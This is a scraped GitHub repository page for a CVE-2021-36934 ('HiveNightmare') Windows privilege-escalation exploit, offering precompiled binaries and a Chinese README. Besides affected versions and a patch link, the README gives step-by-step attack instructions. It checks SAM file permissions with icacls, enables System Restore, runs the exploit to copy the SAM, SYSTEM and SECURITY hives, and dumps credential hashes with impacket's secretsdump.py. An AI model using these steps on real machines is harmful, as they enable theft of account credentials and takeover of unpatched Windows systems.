Kernelhub/CVE-2021-36934 at master · Luciker/Kernelhub

History

Name		Name	Last commit message	Last commit date
parent directory ..
HiveNightmare		HiveNightmare
HiveNightmare.sln		HiveNightmare.sln
HiveNightmare_x64.exe		HiveNightmare_x64.exe
HiveNightmare_x86.exe		HiveNightmare_x86.exe
README.md		README.md
README_EN.md		README_EN.md

README.md

CVE-2021-36934

描述

Windows Elevation 漏洞

影响版本

Product	CPU Architecture	Version	Tested
Windows 10	x64/x86/ARM64	1809
Windows 10	x64/x86/ARM64	1909
Windows 10	x64/x86/ARM64	2004	✔
Windows 10	x64/x86/ARM64	20H2
Windows 10	x64/x86/ARM64	21H1

修复补丁

https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-36934

利用方式

编译环境

VS2019（V140）X64 Release
VS2019（V140）X86 Release

测试系统Windows 10 2004 X64

使用命令来查看目标系统是否是易受攻击的

icacls C:\windows\system32\config\sam

当出现如下图所示就表明是易受攻击的机器

然后需要开启系统还原，右键“此电脑->属性”，点击“系统保护->配置->启用系统保护->应用->确定”

然后创建系统还原点

接着使用EXP即可获取到系统的SAM，SYSTEM和SECURITY文件

最后使用impacket项目进行登录即可

git clone https://github.com/SecureAuthCorp/impacket.git 
cd impacket/examples 
python3 secretsdump.py -sam SAM-2021-07-11 -system SYSTEM-2021-07-11  -security SECURITY-2021-07-11 LOCAL

代码来源

GossiTheDog

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

CVE-2021-36934

CVE-2021-36934

README.md

CVE-2021-36934

描述

影响版本

修复补丁

利用方式

代码来源

Files

CVE-2021-36934

Directory actions

More options

Directory actions

More options

Latest commit

History

CVE-2021-36934

Folders and files

parent directory

README.md

CVE-2021-36934

描述

影响版本

修复补丁

利用方式

代码来源